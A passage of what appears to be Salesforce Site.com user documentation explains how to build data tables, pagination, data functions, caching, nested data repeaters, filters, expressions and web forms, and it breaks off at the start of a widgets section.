7. If you’re linking to a URL or an item in your site, specify where the item should open.

3377

Editing Columns in a Data TableCreating Websites



DescriptionOption

Loads the item into a popup window. When you select this
option, you can set the title for the popup and control its
appearance and size with the options that appear.

Popup window

Loads the item into a new, unnamed browser window.New window (_blank)

Loads the item into the same frame or window as the link.
This is the default setting.

Same window (_self)

Loads the item into the topmost parent frameset or window
of the frame that contains the link.

Topmost window (_top)

Loads the item into the parent frameset or window of the
frame that contains the link.

Parent window (_parent)

8. Click Save.

The column is displayed on the page as an expression. To test the output, preview the page.

To change the name of a column, select the column cell and update the name in the Column Heading field of the Properties
pane.

See Also:
Dynamically Retrieving Data with Data Tables
Site.com Data Services Overview

Adding Pagination to Data Repeaters and Data Tables
Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

User Permissions Needed

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator or designer role assigned at the site level

To build, edit, and manage Site.com sites:

Events let you add interactive and animated effects to the pages and page elements of your website. When using data repeaters
and data tables, you can add pagination events so users can easily page through the displayed data. This is particularly useful
when working with large amounts of data.
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For example, if you’ve added a data repeater that displays all the users in an organization, you can add pagination to help users
navigate through the data. You can add three pagination events:

• Previous Page

• Next Page

• Go To Page

Creating Previous and Next Pagination

You can create previous and next buttons so users can move through the data one page at a time. The process for creating both
buttons is the same.

1. Create your data repeater or data table.
2. In the data repeater or data table, be sure to specify how many records to display per page in the Limits section.
3. Drag a button to the page.
4. In the Properties pane, change the Button Name to Previous Page or Next Page as appropriate.
5. In the Events pane, select the click event.

6. When the Actions box appears, click  and select the Previous Page or Next Page action.
7. In the Target Element, select the data repeater or data table.
8. Click Save.

Creating GoTo Pagination

Creating GoTo navigation is similar to creating the previous and next buttons, but you must add an input field so users can
specify what page they what to go to.

1. Create your data repeater or data table.
2. In the data repeater or data table, be sure to specify how many records to display per page in the Limits section.
3. Drag a Number field onto the page.
4. In the Properties pane, change the field’s Label Name to something that makes sense. For example, Enter Page Number.
5. Drag a Button onto the page.
6. In the Properties pane, change the Button Name to GoTo Page.
7. In the Events pane, select the click event.

8. When the Actions box appears, click  and select the Go To Page action.
9. In the Target Element, select the data repeater or data table.
10. For Input Field ID, select the field you created in step 3.
11. Click Save.

See Also:
Dynamically Retrieving Data with Data Repeaters
Dynamically Retrieving Data with Data Tables
Creating an Event
Available Events and Actions
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Using Data Functions
A data function lets you connect to a standard or custom Salesforce object, perform calculations on the returned results, and
display the calculation on the page. For example, for a particular field in an object, you can use a data function to calculate the
total value or the average amount of all returned records.

Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

User Permissions Needed

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator or designer role assigned at the site level

To build, edit, and manage Site.com sites:

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator or designer role assigned at the site level

AND

“Manage Users”

AND

“Customize Application”

To edit the guest user profile:

To add a data function to a page:

1. Drag a Data Function from the Page Elements pane onto the page.
2. Select the object that you want to connect to.

Note:

• For Site.com users, the drop-down list only displays objects that are available to guest users because site visitors
access your public site via the Guest User license. To make other objects available, go to the guest user profile,
enable the relevant object's “Read” permission, and refresh the list.

• For Communities users, the drop-down list displays objects that may not be available to site visitors. For
authenticated visitors, object access on public and private pages is controlled by their user profiles. For
unauthenticated visitors, object access on public pages is controlled by the site’s guest user profile.

3. Optionally, in Filters, select criteria to filter your data set. If you don’t select any criteria, all the data from the item is
returned.
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a. Select the field to which the filter criteria apply. The Field drop-down list displays the object’s fields, followed by the
fields of all parent objects, which use the format parent_object_name.field_name.

b. Select the operator to control how results are filtered. For example, select Equals to return an exact match.
c. Select the source of the filter value. For example, to specify an explicit value, select Fixed value, or to use the values

passed to the page via a query string, select URL query string.
d. Set the value of the filter. If you’re using a query string, you can also specify what should happen if the query string is

missing.
e. Add additional filter criteria as required to narrow your results further. Each filter item is combined with an AND

operator.

Note:  If you’re using a fixed value to filter the results, you can view the returned records in the Connection Preview
section. To refresh the list of records, click Reload Preview.

4. In Functions, select a function:

DescriptionOption

Counts the number of records that contain a value for the
selected field. For example, if an object contains 30 records,

Count

but only 25 records have a value in the field you specify, the
result is 25.

Returns the highest value of all the values for the selected
field. Applies to numbers, strings, and dates.

Maximum

Calculates the average value of all records for the selected
field. For example, if you have 20 records with a total value

Average

of $20,000 in the Price field, the average is $1,000. Only
applicable to fields that contain numbers.

Returns the lowest value of all the values for the selected
field. Applies to numbers, strings, and dates.

Minimum

Calculates the total value of all records for the selected field.Sum

5. Select the field it applies to.
6. Click Save.

See Also:
The Default, Error, and No Data Views
Improving Performance Using Caching
Data Filtering Examples
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Improving Performance Using Caching
Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

When working with data-bound page elements, such as data repeaters, data tables, and data functions, you can improve the
performance and page rendering of your website using caching. Caching controls how often a page containing a data connection
requests data from Salesforce.

Lets say 100 people visit the site page at the same time. Without caching, the page makes 100 separate requests for the same
data, slowing performance considerably. However, with caching enabled, the data is requested and retrieved only once—the
first time someone visits the page. Any subsequent requests for data during a set time period are returned from the cache.
When the specified time period expires, the cache is refreshed.

The Cache Duration (Minutes) field in the Properties tab controls the length of time to cache retrieved data for the
selected data repeater, data table, or data function.

The default value is 30 minutes. However, the appropriate number of minutes depends on your requirements. For example:

• If the data is updated frequently, such as in a commenting system or a stock ticker, you can disable caching by setting the
value to zero to ensure the freshest data displays on the page.

• If the data changes infrequently, say just once a week, you can set the value to a much greater number of minutes. A longer
caching period also helps ensure pages can display data even if the data source is momentarily unavailable.

Note:  Whenever updates to a site are published, the cache is deleted for all data connections. Caching begins again
the next time a site visitor accesses the page.

See Also:
Dynamically Retrieving Data with Data Repeaters
Dynamically Retrieving Data with Data Tables
Using Data Functions

Accessing Data in Related Objects Overview
Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

Standard and custom objects have relationships that define how records in one object relate to records in another. For example,
the Accounts object has a one-to-many relationship with the Contacts object—that is, each account can have one or more
contacts associated with it. This relationship is also known as a parent-to-child or a master-detail relationship.

See Overview of Object Relationships for more information about relationships between objects in Salesforce.

3382

Improving Performance Using CachingCreating Websites



Data repeaters, data tables, and data functions take advantage of these relationships to let you display data from related objects
on the page.

About Accessing Data in Parent Objects

When you add a data repeater, data table, or data function to the page and connect it to a standard or custom object, you can
automatically access the fields of any parent object it’s related to.

If you add filter criteria to a data repeater, data table, or data function, the Field drop-down list in the Create Data Connection
dialog box displays the object’s fields, followed by the fields of all of its parent objects, which use the format
parent_object_name.field_name. This lets you filter results based on a field in the parent object. So for example, when
retrieving records from the Contacts object, you could decide to return only contacts where the account name
(Account.Account Name) is “ABC Labs.”

Similarly, when you add data elements to a data repeater, or columns to a data table, you can bind them to fields in a parent
object. So for example, if you add a data table that’s connected to the Contact object, you can add a column that binds to its
Full Name field and a column that binds to the Account object’s Account.Account Name field to display the contact’s
name along with the name of the account it’s associated with.

About Accessing Data in Child Objects

You can retrieve data from any child object of a parent object using a data repeater that contains another data repeater, data
table, or data function. The outer or parent data repeater connects to an object, such as Accounts. In turn, the inner data
repeater, data table, or data function automatically lets you connect to any child objects, such as Contacts. This is also known
as a nested data repeater.

Let’s say you want to display a list of accounts along with the names of the associated contacts, similar to this example.

You can achieve this by creating a data repeater (1) that’s connected to Accounts, and adding a data element (2) to it that
binds to the Account Name field. Then add a nested data repeater (3) that’s connected to Contacts, which is a child of
Accounts. Finally, add a data element (4) to the nested data repeater that binds to the Contact object’s Full Name field.
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See Also:
Displaying Data from Related Objects Using Nested Data Repeaters
Dynamically Retrieving Data with Data Repeaters
Dynamically Retrieving Data with Data Tables

Displaying Data from Related Objects Using Nested Data
Repeaters

You can retrieve data from any child object of a parent object using a data repeater that contains another data repeater, data
table, or data function. The outer or parent data repeater connects to an object, such as Accounts. In turn, the inner data
repeater, data table, or data function automatically lets you connect to any child objects, such as Contacts. This is also known
as a nested data repeater.

Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition
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User Permissions Needed

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator or designer role assigned at the site level

To build, edit, and manage Site.com sites:

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator or designer role assigned at the site level

AND

“Manage Users”

AND

“Customize Application”

To edit the guest user profile:

For example, if a data repeater is connected to Accounts, you can add a nested data function to it that’s connected to Contacts
to return the number of contacts associated with each account.

To create a nested data repeater:

1. Add a data repeater to the page.
2. Drag another Data Repeater, Data Table, or Data Function from the Page Elements pane onto the data repeater.
3. Select the related Salesforce object that you want to connect to.

Note:  You can also retrieve data from unrelated objects. However, as this can adversely affect the performance
of your site, we recommend retrieving data from related objects only.

4. Optionally, in Filters, select criteria to filter your data set. If you don’t select any criteria, all the data from the item is
returned.

a. Select the field to which the filter criteria apply. The Field drop-down list displays the object’s fields, followed by the
fields of all parent objects, which use the format parent_object_name.field_name.

b. Select the operator to control how results are filtered. For example, select Equals to return an exact match.
c. Select the source of the filter value. For example, to specify an explicit value, select Fixed value, or to use the values

passed to the page via a query string, select URL query string.
d. Set the value of the filter. If you’re using a query string, you can also specify what should happen if the query string is

missing.
e. Add additional filter criteria as required to narrow your results further. Each filter item is combined with an AND

operator.

Note:  If you’re using a fixed value to filter the results, you can view the returned records in the Connection Preview
section. To refresh the list of records, click Reload Preview.

5. In Sorting, you can specify whether to sort the results by one or more fields in ascending or descending order. For example,
if you’re working with an object that contains user data, you could sort your results by gender first and then by name.
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6. In Limits, you can limit the number of returned results. For example, if you’re only interested in the top five results, enter
5 in the Limit results to field.

7. If you’re adding pagination, specify the number of results to display per page in the Results per page field.
8. If you’re working with a data table, click Next and add fields to the table by double-clicking a field, or selecting it and

clicking .
9. Click Save.

You can either add data elements or custom code to the parent repeater to display its fields. Similarly, if you’ve nested a data
repeater inside the parent data repeater, add data elements or custom code to the nested data repeater to display the child
object’s fields.

Note:  You can’t nest data repeaters more than one level deep.

See Also:
Accessing Data in Related Objects Overview
Dynamically Retrieving Data with Data Tables
Using Data Functions

Data Filters
Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

When you add a data repeater, a data table, or a data function to a page, you don’t have to limit the records it retrieves. However,
if you’re working with a Salesforce object that has thousands of records, you can limit the returned results using filter criteria.

When you add filter criteria, you need to specify:

• The field to which the filter criteria apply
• The operator
• The source of the filter value
• The filter value

Filter Operators

DescriptionOperator

Returns an exact match.Equals

Returns records that don’t have the value you specify.Not equal to

Returns records that are less than the value you specify.Less than

Returns records that exceed the value you specify.Greater than

Returns records that match or are less than the value you specify.Less than or equal to
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DescriptionOperator

Returns records that match or exceed the value you specify.Greater than or equal to

Use when you know what your value starts with, but not the exact text. For example, “california”
would return California Travel, but not Surf California.

Starts with

Use when you know what your value ends with, but not the exact text.Ends with

Returns records that include your search string but might also include other information. For
example, “california” would return California Travel and Surf California.

Contains

Use for field types that support multiple values to return records that contain one or more of the
comma-separated values you specify.

Includes

Use for field types that support multiple values to return records that contain all of the
comma-separated values you specify.

Includes all

Use for field types that support multiple values to return records that don’t contain one or more
of the comma-separated values you specify. For example, for a Locations category field, “San

Excludes

Francisco,Vancouver” would exclude a record containing “San Francisco,Dallas” and a record
containing “Vancouver,New York.”

Use for a field types that support multiple values to return records that don’t contain all of the
comma-separated values you specify. For example, for a Locations category field, “San
Francisco,Vancouver” would exclude only records that contain both terms.

Excludes all

Filter Value Sources

DescriptionSource

Use when you want to specify the value.Fixed value

Use when you want to pass variable content via a URL to the item when the page loads.URL query string

Use when you want to use a fixed value from the site, such as the current date or current
time.

Global property

Use when you want to use a value from the browser, such as the host header or browser
version.

Request header
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DescriptionSource

Use when you want to create a query between unrelated objects. Available only when a
data repeater, data table, or data function is nested inside a parent repeater, but the parent
repeater’s object is unrelated to the nested item’s object.

Parent repeater

Warning:  Retrieving data from unrelated objects can adversely affect the
performance of your site. We recommend retrieving data from related objects
only.

See Also:
Dynamically Retrieving Data with Data Repeaters
Dynamically Retrieving Data with Data Tables
Using Data Functions
About Displaying Dynamic Data Using Expressions

About Displaying Dynamic Data Using Expressions
Site.com uses expression language to display data dynamically. Expressions serve as placeholders for data that will be replaced
with information from your records when the page loads. When working with data-bound page elements, you can use expressions
to customize how data is displayed on the page.

Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

In Site.com, expression syntax consists of an open curly brace and exclamation point, the field or namespace name, and a
closing curly brace. For example, to add an expression for the Billing City field, you can use the syntax {!BillingCity}.
For related objects, the field name is prefixed by the name of the master object: {!Account.BillingCity}.

If you’re editing a data element in a data repeater or a data table column, you can access the object’s fields by name in a
drop-down list without using expressions. However, if you want to customize how the field is displayed on the page, you can
see and edit the expression when you click Customize in the dialog box.

If you’re working with custom code or content blocks in a data repeater, you can only access the object’s fields using expressions.

Expressions let you customize the output by:

• Adding text around the expression. For example, lets say you’re displaying the phone number of each of your business
locations. You could enter the text Contact us at before the {!Phone} expression. When the data is displayed on
the page, {!Phone} is replaced with the field’s value for each record: Contact us at 100–200–3000.

• Formatting the output using HTML tags. For example, you could wrap H1 tags around the expression to alter how the
output is displayed on the page: <H1>{!Phone}</H1>.

• Creating a URL query string to pass variable information to a data repeater or data table on another page. The second
page, in turn, uses the received variable to retrieve and display the relevant records. For example, you could create a hyperlink,
such as /product_details?productID={!id}, where {!id} is replaced with the product ID for each record. When
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a particular product link is clicked, the product ID is passed to the Product Details page, which uses the ID to retrieve the
record’s information and display it on the page.

See Also:
Dynamically Retrieving Data with Data Repeaters
Dynamically Retrieving Data with Data Tables
Using Data Functions

Data Filtering Examples
Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

When working with data repeaters, data tables, and data functions, you can filter the data you retrieve in many ways. In this
topic, we explore two options—fixed values and URL query strings—to illustrate some common filtering techniques.

Example 1: Using a Fixed Value to Filter Results

In our first example, we have a custom object called “News” that stores company news and events. Each news item has a
Status picklist that can be set to either In Progress or Approved. We only want to display approved news items on our
Company News page. In this case, we can use a fixed value to filter the data in the News object.

In this scenario you would:

1. Add a data repeater to the page and configure it as follows:

a. Select the News custom object.
b. Select the Status field.
c. Select the Equals operator.
d. Select Fixed value as the filter source.
e. Enter Approved in the Value text box that appears.

This tells the data repeater to return only records where the Status field contains the value Approved.
2. Add data elements to the data repeater to display the required fields, such as Title, Description, and Date, on the page.

Example 2: Using a URL Query String to Dynamically Filter and Display Results on Another Page

In our second example, we have a custom object called “Products” that stores product information. However, some products
are only available in certain locations, so we’d like to let customers view the products in their nearest city. In this case, we could
create a Locations site page that contains links to each available city.

We want each link to open the Products site page, but only display products based on the user’s selection. We can do this
using URL query strings, which allow us to pass variable content between HTML pages. The variable information in this
case is the product location; the data repeater won’t know which products to return until the user makes a selection.

For this scenario, you would:

1. Add a data repeater to the Products page and configure it as follows:

a. Select the Products custom object.
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b. In the Filters section, set the criteria to City Equals URL query string.
c. In the Value text box, enter the variable name—in this case, location.
d. In the If query string is missing drop-down list, select Don’t apply this filter item. This option is used when a customer

wants to view all products without filtering.
e. Click Save.

2. Add data elements for the fields you want to display, such as Product Name, Description, and Price.
3. On the Locations page, add a data repeater and select the Products custom object.
4. Add a data element to the data repeater to represent the City field and configure it as follows:

a. Select the City field as the field to display, because we want to use the name of the city as the hyperlink.
b. Select Text as the display format.
c. Click Add a hyperlink to display a URL on the page.
d. In the Link to drop-down list, select An item in your site and select the Products page.
e. Change the value to /product?location={!City}, where {!City} is a placeholder for the value of a record’s

City field. When the page first loads, {!City} is replaced with the correct value, such as Dallas, which creates the
following URL for that record:

/product?location=Dallas

When clicked, this opens the Products page and passes Dallas as the value of the location variable.

f. For the tooltip, select the City field and click Customize.
g. Change the value to Show me products available in {!City}.

Again, the {!City} placeholder is replaced by the value of the City field for each record when the page loads.

Now, when the Locations page loads, the data repeater displays the location of each product as a link. When a customer clicks
a link, such as Dallas, the Locations page passes location=Dallas to the Products page. As the Products page loads, the
data repeater uses this value to dynamically return only records where the City field contains the value Dallas.

See Also:
Dynamically Retrieving Data with Data Repeaters
Displaying Data Using Data Elements
Dynamically Retrieving Data with Data Tables
Accessing Data in Related Objects Overview
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COLLECTING AND SUBMITTING DATA USING FORMS

Adding a Form to the Page
Use forms to collect data from your site visitors and submit the data to standard or custom Salesforce objects. Create web-to-lead
forms, capture customer details, or gather feedback on your products or services.

Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

User Permissions Needed

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator or designer role assigned in Site.com Studio

To add a form to the page:

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator or designer role assigned in Site.com Studio

AND

“Manage Users”

AND

“Customize Application”

To edit the guest user profile:

To add a form to a page:

1. Drag a Form from the Page Elements pane onto the page.
2. Select the Salesforce object that you want to submit data to.

Note:

• For Site.com users, the drop-down list only displays objects that are available to guest users because site visitors
access your public site via the Guest User license. To make other objects available, go to the guest user profile,
enable the relevant object's “Create” permission, and refresh the list.

• For Communities users, the drop-down list displays objects that may not be available to site visitors. For
authenticated visitors, object access on public and private pages is controlled by their user profiles. For
unauthenticated visitors, object access on public pages is controlled by the site’s guest user profile.
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3. Add available fields to the form by double-clicking a field, or selecting it and clicking .

All required fields are automatically added to the list of selected fields. However, you can hide required fields after you add
the form to the page.

4. Reorder the list of selected fields by clicking Move Up or Move Down.
5. Click Save.

Note: When adding forms to authenticated community pages in Site.com, set the current user for Salesforce objects
that require the Owner ID field. Setting the current user (as opposed to the default guest user) lets you identify the
authenticated user when the form is submitted. To set the current user for the Owner ID field, select the field in the
form, click Configure under Field Properties in the Properties pane, select Global Property as the source, and
select Current userID as the value.

After you add a form to the page, you can’t change the object it’s connected to. If you need to connect to a different object,
you must replace the form.

You can use the form’s Properties pane to:

• See which object the form is connected to.
• Add a title to the top of the form.
• Specify what occurs when a user successfully submits the form.
• Change the appearance of the form by selecting a different theme.

See Also:
Adding Input Fields to Forms or Pages
Input Field Types
Editing Input Fields in a Form

Adding Input Fields to Forms or Pages
Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

User Permissions Needed

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator or designer role assigned at the site level

To build, edit, and manage Site.com sites:

Adding Input Fields to a Form

You can add additional input fields to an existing form. Each input field binds to a field in the object the form is connected
to.
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The quickest option is to:

1. Select the form on the page.
2. Select  > Add Fields.
3. In the Add Fields list, click the fields that you want to add. The Add Fields list displays the available fields in the object

that the form is connected to. When you click a field, the correct field type is automatically added to the form, such as a
checkbox or picklist field.

Alternatively:

1. Select the form on the page.
2. Select  > Add Page Elements.
3. In the Add Page Elements list, click the input field type that you want to add, such as Checkbox.
4. Choose a field in the Add a Field dialog box and click Save. If no fields of that type exist in the object, you can’t add a

field of that type to the form.

Note:

• You can’t add fields to a form by clicking  > Edit Form.
• Formula, encrypted text, geolocation, and lookup field types aren’t supported.
• You can’t configure the default field-level error messages that appear when users enter an incorrect value.

Adding Input Fields to a Page

You can add input fields directly to a page, panel, data repeater, or data table to build your own custom features using custom
code. For example, let’s say some of your products are only available in certain locations and you’d like to let customers view
the products in their nearest city. You could add a picklist input field to the page that lists the various locations. Using custom
code, you could then pass the user’s selection to a data table or data repeater via a query string to display a filtered product list.

To add an input field to the page, drag it from the Page Elements pane onto the page. Alternatively, select the page or container
page element in the Page Structure pane, select  > Add Page Elements, and select the input field.

See Also:
Input Field Types
Input Field Properties
Editing Input Fields in a Form
Adding a Form to the Page

Editing Input Fields in a Form
After you’ve added a form to the page, you can edit and reorder its fields.

Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition
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User Permissions Needed

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator or designer role assigned at the site level

To build, edit, and manage Site.com sites:

To reorder fields, drag them to the correct position on the page or in the Page Structure pane. Alternatively, select a field and
click  > Move Up or  > Move Down.

To hide a field, such as required field that you don’t want your site visitors to see, select Hidden Field in the Properties
pane. When you hide a field, you can access it from the Page Structure pane.

To make a field a required field, which means the user must complete the field before submitting the form, select Required
Field in the Properties pane. A red asterisk (*) is displayed beside the field to indicate that it’s required. You can’t change
the Required Field setting for any fields that are required by the object the form is connected to.

To rename a field, replace the name in the Label Name field in the Properties pane.

To change the appearance of a field on the page, select a different theme in the Properties pane. If the field is in a form, you
can only change the form’s theme.

Note:

• You can’t move fields from a form onto the page. However, you can delete non-required fields, or hide both
required and non-required fields.

• You can’t drag fields from the page onto a form.

See Also:
Adding Input Fields to Forms or Pages
Input Field Properties
Setting the Default Value of Input Fields
Adding a Form to the Page

Input Field Types
Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

When adding input fields to a form or page, the following field types are available. However, if the object connected to a form
doesn't contain a particular field type, you can’t add that input field type to the form.

DescriptionPage Element

Lets users set a true (selected) or false (deselected) value on a
form or page.

Checkbox
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DescriptionPage Element

Lets users enter a currency amount on a form or page.Currency

Lets users enter a date on a form or page. If the field’s
Date/Time Selector property is set to Popup Calendar,
the user can pick the date from a popup calendar.

Date

Lets users enter a date and time on a form or page. If the field’s
Date/Time Selector property is set to Popup Calendar,
the user can pick the values from a popup calendar.

Date/Time

Lets users enter a valid email address on a form or page.Email

Lets users select one or more values from a list on a form or
page.

Multi-Select Picklist

Lets users enter a whole number on a form or page.Number

Lets users enter a percent amount on a form or page.Percent

Lets users enter a phone number on a form or page.Phone

Lets users select a value from a list on a form or page.Picklist

Lets users enter up to 32,768 characters on a form or page.
Supports any combination of letters, numbers, or symbols.
Users can format the text, and add images and hyperlinks.

Rich Text Area

Lets users enter up to 255 characters (depending on the field
limit in the Salesforce object) on a form or page. Supports any
combination of letters, numbers, or symbols.

Text

Lets users enter up to 32,768 characters on a form or page,
which display on separate lines. Supports any combination of
letters, numbers, or symbols.

Text Area

Lets users enter a valid website address on a form or page.URL

See Also:
Adding Input Fields to Forms or Pages
Input Field Properties
Adding a Form to the Page

Input Field Properties
Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

When adding or editing input fields on a form or page, use the options in the Field Properties section of the Properties pane
to control how the selected input field functions.
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DescriptionName

The external name of the field. This is displayed as the field
name on the form or page.

Label Name

Sets the field’s default value. This automatically populates the
field with the value you specify when the page loads.

Default Value

When selected, makes the field mandatory, so the user can’t
submit a record without entering a value. A red asterisk (*) is
displayed beside the field to indicate that it’s required.

You can’t change the Required Field setting for any fields
that are required by the object the form is connected to.

Required Field

When selected, hides the field from the form or page. For
example, you may want to hide a required field from your site

Hidden Field

visitors, or set the default value for a field that you don’t want
users to see or edit. When you hide a field on the page canvas,
you can still access it from the Page Structure pane.

Applies to the Date/Time field only. Sets whether users can
select the date and time using a popup calendar.

Date/Time Selector

Applies to Picklist and Multi-select Picklist fields
only, and only when added directly to the page. Sets the list

Picklist Values

of items to display in the picklist. (You can’t modify the picklist
items if the field is connected to an object.)

Each picklist item consists of a Label and a Value field. The
Label field is displayed in the picklist, whereas the Value
field is an internal value. In most situations, you can use the
same value in both fields, unless you want to submit a different
value than the one displayed to the user.

Click  to enter values for the Label and Value fields.

Applies to Rich Text Area and Text Area fields only.
Sets the number of rows of text to display.

Rows

See Also:
Input Field Types
Adding Input Fields to Forms or Pages
Editing Input Fields in a Form
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Setting the Default Value of Input Fields
You can set the default value of an input field that you add to a form or page. This automatically populates the input field
with the value you specify when the page loads.

Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

User Permissions Needed

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator or designer role assigned at the site level

To build, edit, and manage Site.com sites:

When used with a field’s Hidden Field property, which hides the field on the form or page, the default value is a useful
tool for submitting data that you don’t want your users to see. For example, you could add a hidden field that uses the Global
Property option to track when a form is submitted.

Note:  Default field values that are already set on the object aren’t transferred to Site.com.

To set the default value of a field:

1. Select the field.
2. Click Configure in the Properties pane.
3. Select the source of the default value.

DescriptionOption

Use when you want to specify the value. For example, for a
text field, you could add default text. Alternatively, if the
field is a picklist, you can select a default value from the list.

Fixed Value

Use when you want to pass variable content via a URL to
the item when the page loads. For example, if you’re working

URL Query String

with a picklist field, you could pass variable information,
such as location, to filter the list and display only items from
that location. See Data Filtering Examples for similar
scenarios using data repeaters.

Use when you want to use a fixed value from the site, such
as the current date or current time.

Global Property

Use when you want to use a value from the browser, such
as the host header or browser version.

Request Header

3397

Setting the Default Value of Input FieldsCreating Websites



4. Set the default value.
5. Click Save.

See Also:
Adding Input Fields to Forms or Pages
Editing Input Fields in a Form
Adding a Form to the Page

Setting a Form’s Submit Behavior
When your site visitors submit a form successfully, you can either redirect them to another page or display a message indicating
that they were successful.

Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

User Permissions Needed

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator or designer role assigned at the site level

To build, edit, and manage Site.com sites:

When the page is open:

1. Select the form in the Page Structure pane.
2. In the Properties pane, select an option in the When Successful drop-down list.

DescriptionOption

Redirects the user to the page that you specify.Show another page

Displays a message below the form.Display a message

3. As appropriate, specify either:

• The page to redirect to in the Page URL field. You can enter a relative URL, such as a site page, or an absolute URL.
For relative URLs, ensure you include a forward slash (/).

• The message text in the Message Text field.
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Tip:  The form’s Submit button uses the submit action in the Events pane.

See Also:
Adding a Form to the Page
Input Field Properties
Site.com Data Services Overview

Styling Forms
Forms are styled using CSS themes that you can customize to match the design of your website.

Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

User Permissions Needed

Site.com Publisher User field enabled on the user detail
page

AND

Site administrator or designer role assigned at the site level

To build, edit, and manage Site.com sites:

When you add a form to a page, the form uses a default theme to control its appearance. To change the form’s theme, select
an option in the Theme section in the Properties pane:

• Default places the field name above the text box. Required fields are denoted by a red asterisk (*) beside the field name.
• Salesforce.com places the field name to the left of the text box. Required fields are denoted by a red vertical bar (|) in

front of the text box.

Alternatively, to customize a theme to suit your needs:

1. Select the form on the page.
2. Select a theme to use as a base in the Theme section of the Properties pane.
3. Open the Style pane and ensure Class is selected.
4. In the Style drop-down list, select the part of the form that you want to style. When you select an item, it's highlighted

for a few seconds so you can easily see which part you're styling.

DescriptionOption

Styles the whole form.Entire form

Styles each field row.Field rows

Styles the labels of each field.Field labels

3399

Styling FormsCreating Websites



DescriptionOption

Styles the fields (text boxes, drop-down lists, and so on).
Only available for the Salesforce.com theme.

Fields

Styles the asterisk symbol (*) for required fields. Only
available for the default theme.

Required symbol

Styles the error message that’s displayed when users try to
submit an incorrectly completed form. Only available for
the default theme.

Error message

Tip:  If you're familiar with CSS, you can also modify the style of the form in the site's style sheet.

5. To style the selected part of the form, update the Style pane properties. Your theme customizations are reflected immediately
in the form, and apply to the selected form only.

6. Repeat as required for each part of the form.

See Also:
Adding a Form to the Page

The Default, Error, and No Data Views
Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

When working with data repeaters, data tables, data functions, and forms, you can customize what your site visitors see if an
error occurs when connecting to the data source. Additionally, for data tables, data repeaters, data functions, you can customize
what’s displayed when no data exists for the current query. For example, if you set up a data repeater to dynamically filter and
display results based on the user’s selection, but there are no results for that selection, you can display an appropriate message
to explain what happened.
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• The Default View (1) is what usually appears on the page. For example, when you add a form to the page, the Default
View contains the form’s fields.

• The Error View (2) is displayed if an error occurs when connecting to the data source. It contains a content block with a
default message that you can customize. You can also add other page elements to the view.

• The No Data View (3) is displayed when no data exists for the current query. It contains a content block with a default
message that you can customize. You can also add other page elements to the view.

See Also:
Dynamically Retrieving Data with Data Repeaters
Dynamically Retrieving Data with Data Tables
Using Data Functions

Repairing Data Connections
Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

If you or another user modifies the object that an existing data repeater, data table, data function, or form is connected to, the
data connection might break. For example, this can happen if a connected object or field is renamed or deleted, or if its
permissions are changed.

When you open a site page containing broken data connections, a dialog box that lists the problems appears. Hover over each
item's  icon to see the possible solutions.

SolutionProblem

Open the guest user profile and ensure the “Read” permission
is enabled on the object.

If that’s unsuccessful, click Edit beside the listed item to open
the Data Connection dialog box, and ensure the correct object

A data repeater, data table, or data function is connected to
an object that doesn’t have the correct access permission, or
has been renamed or deleted.
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SolutionProblem

is selected. If the object has been renamed, select the renamed
object. If the object has been deleted, you must either choose
a different object or delete the page element.

Open the guest user profile and ensure the object has the
correct field-level security enabled for each field.

If that’s unsuccessful, click Edit beside the item to open the
Data Connection dialog box, and reset the filter criteria.

A data repeater, data table, or data function is trying to filter
results using fields that are longer visible, or have been renamed
or deleted.

Open the guest user profile and ensure the object has the
correct field-level security enabled for the field.

If that’s unsuccessful, click Edit beside the item to open the
Edit Data Element dialog box, and ensure the correct fields

A data element is connected to a field that’s no longer visible,
or has been deleted or renamed.

are referenced in all relevant drop-down lists and in any custom
text.

Open the guest user profile and ensure the “Create” permission
is enabled on the object.

If that’s unsuccessful, you must replace the form, as you can’t
edit a form’s data connection.

A form is connected to an object that doesn’t have the correct
access permission, or has been renamed or deleted.

Add the missing field to the form.A form is missing one or more required fields, which were
added to the object after the form was created.

Open the guest user profile and ensure the object has the
correct field-level security enabled for the field.

If that’s unsuccessful, remove the field from the form.

A form field is pointing to a field that’s no longer visible, or
has been renamed or deleted.

Note:  If you’re a Communities user working with authenticated pages, keep in mind that object access on public and
private pages is controlled by the user profile of the authenticated user. The guest user profile controls object access
on public pages for unauthenticated visitors only.

See Also:
Setting Data Access Permissions for Salesforce Objects
Dynamically Retrieving Data with Data Repeaters
Adding Input Fields to Forms or Pages
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BUILDING CUSTOM WIDGETS

Widgets Overview
Available for purchase in: Enterprise and Unlimited Editions

Available (with limitations) in: Developer Edition

Widgets let you save time by building custom page elements that you and your team can reuse throughout the site. Using the
